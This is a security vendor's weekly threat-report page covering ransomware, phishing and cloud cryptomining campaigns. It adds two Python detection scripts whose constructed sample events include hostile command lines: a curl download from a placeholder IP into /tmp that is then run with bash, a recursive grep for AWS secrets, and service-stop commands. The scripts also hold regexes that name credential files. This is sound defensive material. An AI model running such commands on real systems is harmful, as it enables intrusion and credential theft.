The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as run exposure checks on your endpoint devices and servers, which can help identify successful payload delivery and compromise through a given vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

REvil Return?

April 26, 2022

Industry: N/A | Level: Strategic | Source: BleepingComputer

After months of inactivity, REvil ransomware servers have come back online in the TOR network, redirecting to a new operation assumed to have started in mid-December 2021. As reported by Bleeping Computer, security researchers pancak3 and Soufiane Tahiri identified a new REvil leak site being promoted on RuTOR, a Russian-speaking forum. “The new site is hosted on a different domain but leads to the original one REvil used when active, Bleeping Computer confirmed today.” The site recruits affiliates, offering a new copy of the REvil ransomware along with an 80/20 revenue split. Old victim pages have been reposted, and new victims are listed on the site, including Oil India. With no concrete leads on the affiliates associated with the new site, its members, or a sample of the new REvil ransomware, the activity around REvil remains a mystery and will require additional investigation.

Rise in LinkedIn Phishing Lures

April 26, 2022

Industry: N/A | Level: Strategic | Source: CheckPoint

Social media has surpassed shipping, retail, and technology as the most targeted category for phishing. Previous campaigns have relied on delivery-tracking emails as lures; however, abuse of the LinkedIn brand accounted for over half (52%) of phishing emails in CheckPoint’s research for the first quarter of 2022. The change in theme was dramatic, as in the previous quarter the LinkedIn theme was used in only 8% of phishing attempts. Threat actors appear to be leveraging the LinkedIn lures to obtain users’ credentials for the social media platform. Shipping companies remain a prominent abuse category in second place, as the timing remains ripe for lures that take advantage of e-commerce sales. The 10 most abused brands of Q1 2022, ranked by CheckPoint according to their usage, are as follows: LinkedIn (52%), DHL (14%), Google (7%), Microsoft (6%), FedEx (6%), WhatsApp (4%), Amazon (2%), Maersk (1%), AliExpress (0.8%), and Apple (0.8%).

FBI Warns of Ransomware Threat to Food and Agriculture Organizations

April 26, 2022

Industry: Agriculture | Level: Strategic | Source: IC3

The US Federal Bureau of Investigation’s (FBI) latest private industry notification warns that ransomware actors are likely to target agricultural cooperatives during critical planting and harvest seasons. The attacks aim to disrupt business operations, create financial losses, and impact the supply chain. As described in the report, “The FBI noted ransomware attacks during these seasons against six grain cooperatives during the fall 2021 harvest and two attacks in early 2022 that could impact the planting season by disrupting the supply of seeds and fertilizer. Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production.” Initial access appears to come through common vulnerabilities, with secondary infections resulting from the compromise of network resources or managed services. In 2022 there have been two identified impacts on agricultural companies: a multi-state grain company was impacted by Lockbit 2.0 in March 2022, and in February 2022 a feed milling and agricultural services company identified and prevented a potential network intrusion. Disruption of grain production would have severe repercussions across the supply chain, affecting consumers, animals, and commodities trading.

Vigilance for Critical Infrastructure Defense

April 26, 2022

Industry: Critical Infrastructure | Level: Strategic | Source: Defense.gov

A joint advisory provided by the Cybersecurity and Infrastructure Security Agency (CISA) along with Australia, Canada, New Zealand, and the United Kingdom, urges critical infrastructure operators to remain alert to cyber activity from Russia. As the conflict continues to impact Russia’s economy, intelligence continues to point towards the Russian government exploring options for cyberattacks. As provided in the advisory, government agencies are urging vigilance, “U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities urge critical infrastructure network defenders to prepare for and mitigate potential cyber threats—including destructive malware, ransomware, DDoS attacks, and cyber espionage—by hardening their cyber defenses and performing due diligence in identifying indicators of malicious activity.”

Lapsus$ Breached T-Mobile

April 26, 2022

Industry: N/A | Level: Strategic | Source: Krebs On Security

Through review of activity from the data extortion group Lapsus$, independent researcher Brian Krebs identified a breach of wireless network operator T-Mobile in March 2022. Krebs obtained private chat messages from Lapsus$ members, and indications are that the group breached T-Mobile multiple times, obtaining source code for various company projects in order to extort the communications provider for financial gain. T-Mobile has confirmed the breach but stated to Bleeping Computer that customer and government data was not compromised: “The systems accessed contained no customer or government information or other similarly sensitive information, and we have no evidence that the intruder was able to obtain anything of value.” The chat logs examined by Krebs reveal the group’s operations thanks to the members’ candid conversations. The Lapsus$ hackers obtained access by purchasing compromised systems and credentials on the Russian Market. Additionally, the group enticed insiders to supply access, with T-Mobile employees providing internal access and capabilities to Lapsus$ hackers to conduct “SIM swaps.” Although the hackers were shut out from time to time when T-Mobile employees logged into their own accounts or changed their passwords, Lapsus$ was able to discover or purchase another set of T-Mobile VPN credentials. A T-Mobile customer management tool, Atlas, was compromised by Lapsus$ on March 19th, 2022, with the threat actors attempting to access accounts related to the FBI and Department of Defense; however, the information required “additional verification procedures before any changes could be processed,” thwarting the attackers’ attempts to access government account data.

Docker Targeted by LemonDuck

April 26, 2022

Industry: N/A | Level: Tactical | Source: CrowdStrike

Intelligence from CrowdStrike tracks operations of the cryptomining botnet LemonDuck targeting Docker. A unique aspect of the campaign is the use of proxy pools to hide the attackers’ wallet address: “Proxy pools help in hiding the actual crypto wallet address where the contributions are made by current mining activity.” LemonDuck initially gains access by compromising exposed Docker APIs. Once inside, a custom Docker ENTRYPOINT is used to set executables that always run when the container starts, in order to download a bash script that masquerades as a PNG file. The script sets a cron job and downloads an additional bash file disguised as “a.asp,” which is the true payload in the attack. Prior to initiating the mining operation, the script terminates processes, network connections, and other indicators that could belong to rival cryptominers, as well as terminating the crond, sshd, and syslog daemons. LemonDuck operators are also capable of disabling Alibaba’s cloud monitoring service. The mining setup completes with the download of XMRig. Lateral movement is conducted over SSH: after locating SSH keys, the attackers log into other servers and continue deploying scripts.

  • Anvilogic Scenario: LemonDuck Cryptomining Campaign with initial Bash Script
  • Anvilogic Use Cases:
    • Publicly exposed Docker API
    • Rare shell script execution
    • Crontab Job Scheduling (Unix)
    • File Download (Unix)
    • Locate Credentials
    • Service Stop Commands
    • SSH Pivoting
    • Multiple SSH Logins Across Different Machines

TeamTNT Scripts

April 26, 2022

Industry: N/A | Level: Tactical | Source: CiscoTalos

Various script files used by the threat group TeamTNT against AWS and Alibaba have been examined by Cisco Talos. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. The capabilities of the scripts vary: they can initiate cryptocurrency mining, gather credentials, download additional payloads, modify file permissions, disable tools, and achieve persistence and lateral movement. An AWS credential discovery and theft script, “GRABBER_aws_cloud.sh”, enumerates the host’s directories, querying for the string AWS. When matches are identified, the script writes the results to a file, exfiltrates the data, and deletes the created file. Scripts that download payloads often check the system’s architecture to ensure a compatible script is downloaded for execution. TeamTNT is quite proficient in the cloud space; in addition to its abundance of robust scripts, the group has employed techniques, observed by Trend Micro, Cado Security, and Cisco Talos, to disable cloud security tooling and cloud logging. Whilst agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted, some omissions have been observed by Cisco Talos: “TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools.”

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Locate Credentials
    • Linux CURL or WGET Direct to IPv4 Address
    • File Download (Unix)
    • Rare shell script execution
    • Service Stop Commands
    • Output to File
    • Modify File Attributes
    • New Linux Service Started/Enabled
    • File Modified for Execution
    • File Execution (Unix)
    • New Docker Container
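Both the LemonDuck and TeamTNT write-ups above describe chains of atomic Unix behaviors (a download from a bare IP address, a script run from a temp directory, cron scheduling, service stops, a search for credentials) that only become a confident finding when several of them fire together on one host. The Python below is an added example, not Anvilogic's detection content nor code from CrowdStrike or Cisco Talos: it models each behavior as a Threat Identifier over a command line and a Threat Scenario that fires when three or more distinct identifiers occur on one host within 30 minutes of a direct-to-IP download. The event layout (host, ISO timestamp, command line), the regular expressions, and the sample events are all assumptions constructed for this example.

```python
"""Sequence-based detection over Unix process events (added example).

The records below are constructed, not real telemetry, and the field
layout (host, ISO timestamp, command line) is an assumption; map your
own EDR or auditd schema onto it before use.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Threat Identifiers: atomic patterns over a single command line. Names
# mirror the use-case list above; the regexes are this example's own.
IDENTIFIERS = {
    "direct_ip_download": re.compile(
        r"\b(curl|wget)\b.*\bhttps?://\d{1,3}(\.\d{1,3}){3}\b"),
    "rare_shell_script": re.compile(r"\b(ba)?sh\s+(/tmp|/var/tmp|/dev/shm)/\S+"),
    "crontab_scheduling": re.compile(r"\bcrontab\b|/etc/cron\.d/|/var/spool/cron/"),
    "service_stop": re.compile(
        r"\b(systemctl\s+(stop|disable)|service\s+\S+\s+stop|pkill|killall)\b"),
    # chmod +x or any octal mode with an execute bit (odd digit) set
    "modify_file_attributes": re.compile(r"\bchmod\s+(\+x|[0-7]*[1357][0-7]*)\b"),
    "locate_credentials": re.compile(
        r"\b(grep|find)\b.*(AWS_|\.aws/credentials|\.ssh/|id_rsa)"),
}


def match_identifiers(cmdline):
    """Return the set of identifier names that fire on one command line."""
    return {name for name, rx in IDENTIFIERS.items() if rx.search(cmdline)}


def detect_scenarios(events, window=timedelta(minutes=30), min_hits=3):
    """Threat Scenario: a host on which at least `min_hits` distinct
    identifiers fire within `window` of a direct-to-IP download.
    Returns {host: sorted identifier names} for hosts that trip it."""
    by_host = defaultdict(list)
    for host, ts, cmd in events:
        hits = match_identifiers(cmd)
        if hits:
            by_host[host].append((datetime.fromisoformat(ts), hits))
    findings = {}
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, names0) in enumerate(hits):
            if "direct_ip_download" not in names0:
                continue  # the scenario is anchored on the download
            seen = set(names0)
            for t, names in hits[i + 1:]:
                if t - t0 > window:
                    break  # hits are time-ordered, so later ones are out of window too
                seen |= names
            if len(seen) >= min_hits:
                findings[host] = sorted(seen)
                break
    return findings


# Constructed sample events (not real logs) in the assumed layout.
SAMPLE_EVENTS = [
    ("web01", "2022-04-20T10:00:00", "curl -fsSL http://203.0.113.10/a.png -o /tmp/a.png"),
    ("web01", "2022-04-20T10:00:05", "bash /tmp/a.png"),
    ("web01", "2022-04-20T10:00:20", "crontab -l"),
    ("web01", "2022-04-20T10:00:25", "systemctl stop crond"),
    ("web01", "2022-04-20T10:01:00", "grep -r AWS_SECRET /home /root"),
    ("build02", "2022-04-20T11:00:00", "curl -fsSL http://203.0.113.10/x.sh -o /tmp/x.sh"),  # lone download
    ("build02", "2022-04-20T15:00:00", "chmod +x /opt/app/bin/run.sh"),  # outside the window
    ("db01", "2022-04-20T12:00:00", "systemctl stop postgresql"),  # admin action, no download
]

if __name__ == "__main__":
    for host, names in detect_scenarios(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(names)}")
```

Only web01 trips the scenario; build02 has a download but its only other identifier lands hours later, and db01 has a service stop with no anchoring download, which is the point of layering a sequence on top of the atomic identifiers: each identifier alone is noisy, the sequence is not.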

Catching Up With Emotet

April 26, 2022

Industry: N/A | Level: Tactical | Source: Fortinet

Fortinet reviewed activity from Emotet campaigns delivering malicious documents using a variety of attack techniques. Since the malware’s reemergence in November 2021, it has been highly active; however, activity has tapered slightly, potentially due to Microsoft disabling Excel 4.0 macros by default in January 2022. Analysis of five malicious document samples identified the use of Excel or Word documents containing either a malicious VBA macro or an Excel 4.0 macro to deliver Emotet. Execution of the macro typically invokes wscript, PowerShell, or Mshta to download the Emotet payload. Following its download, the malware is executed with rundll32 or regsvr32.

  • Anvilogic Scenario: Emotet Behaviors
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Compressed File Execution
    • Wscript/Cscript Execution
    • Invoke-WebRequest Command
    • Suspicious File written to Disk
    • regsvr32 Execution
    • Rundll32 Command Line

Trend Micro Analyzes BlackCat Ransomware

April 26, 2022

Industry: N/A | Level: Tactical | Source: Trend Micro

Trend Micro shares details of an incident involving BlackCat ransomware to provide insight into the infection sequence. The attack began with the identification of suspicious web shells on Microsoft Exchange servers, planted by exploiting the ProxyLogon and ProxyShell vulnerabilities. Subsequent activity involved PowerShell spawned from the Internet Information Services (IIS) worker process (w3wp.exe) to download a Cobalt Strike Beacon and a DLL file that was executed with rundll32.exe. Through process injection into the Windows Error Reporting process (WerFault.exe), the attackers ran discovery commands, accessed credentials by dumping NTDS.dit with CrackMapExec, and spread laterally through the environment over SMB. Prior to ransomware execution, the attackers launched batch scripts; however, the scripts were not captured by Trend Micro for analysis.

  • Anvilogic Scenario: BlackCat Ransomware: Post-Exploitation of Exchange
  • Anvilogic Use Cases:
    • Exchange New Export Request
    • Potential Web Shell
    • Potential ProxyShell
    • IIS Worker (W3WP) Spawn Command Line
    • Suspicious File written to Disk
    • Rundll32 Command Line
    • Common Active Directory Commands
    • SharpHound Enumeration
    • SharpHound Keywords
    • Python Execution
    • Rare Remote Thread
    • NTDSUtil.exe execution
    • Potential Lateral Movement via SMB
    • Executable Create Script Process
    • Encoded Powershell Command
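The Emotet and BlackCat entries above both turn on process ancestry on Windows: an Office document spawning wscript, PowerShell, or mshta and then rundll32 or regsvr32, and the IIS worker process w3wp.exe spawning PowerShell. The Python below is an added example, not Anvilogic's detection content nor code from Fortinet or Trend Micro; it reconstructs parent chains from process-creation events and checks them against those two patterns plus an encoded-PowerShell identifier. The field layout (pid, ppid, image, command line), the rule names, and the sample events are constructed assumptions.

```python
"""Process-ancestry detection over Windows process-creation events (added example).

Records are constructed, not real Sysmon or EDR telemetry; the field
layout (pid, ppid, image, command line) is an assumption to map onto
your own schema before use.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob of 20+ chars
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)


def ancestry(proc, by_pid):
    """Lower-cased images of proc and its ancestors, nearest first.
    Stops at an unknown parent pid or a cycle (pid reuse)."""
    chain, seen = [], set()
    while proc is not None and proc.pid not in seen:
        seen.add(proc.pid)
        chain.append(proc.image.lower())
        proc = by_pid.get(proc.ppid)
    return chain


def detect(events):
    """Return a list of (pid, rule_name) findings over the event list."""
    by_pid = {p.pid: p for p in events}
    findings = []
    for p in events:
        chain = ancestry(p, by_pid)
        img, parents = chain[0], chain[1:]
        # Emotet-style: Office -> script host -> rundll32/regsvr32 (any depth)
        if (img in LOADERS and any(a in SCRIPT_HOSTS for a in parents)
                and any(a in OFFICE for a in parents)):
            findings.append((p.pid, "office_script_loader_chain"))
        # Malicious Document Execution: Office directly spawning a script host
        if img in SCRIPT_HOSTS and parents and parents[0] in OFFICE:
            findings.append((p.pid, "office_spawns_script_host"))
        # BlackCat-style: IIS worker (w3wp.exe) directly spawning a shell
        if img in SHELLS and parents and parents[0] == "w3wp.exe":
            findings.append((p.pid, "iis_worker_spawns_shell"))
        if img == "powershell.exe" and ENCODED_PS.search(p.cmdline):
            findings.append((p.pid, "encoded_powershell"))
    return findings


# Constructed sample events (not real logs). The base64 blob is a
# placeholder, not a real command.
SAMPLE_EVENTS = [
    Proc(100, 1, "explorer.exe", "explorer.exe"),
    Proc(200, 100, "EXCEL.EXE", '"EXCEL.EXE" invoice.xlsm'),
    Proc(201, 200, "wscript.exe", "wscript.exe //e:jscript C:\\Users\\u\\AppData\\Local\\Temp\\x.js"),
    Proc(202, 201, "rundll32.exe", "rundll32.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.dll,DllRegisterServer"),
    Proc(300, 1, "w3wp.exe", 'w3wp.exe -ap "MSExchangeOWAAppPool"'),
    Proc(301, 300, "powershell.exe", "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    Proc(400, 100, "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),  # benign admin use
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Walking the full chain rather than only the immediate parent is what catches the Emotet sequence, where rundll32 is two hops away from the Office process; the benign PowerShell launched from explorer.exe (pid 400) matches no rule, so the chain rules add specificity that a flat "powershell.exe started" identifier lacks.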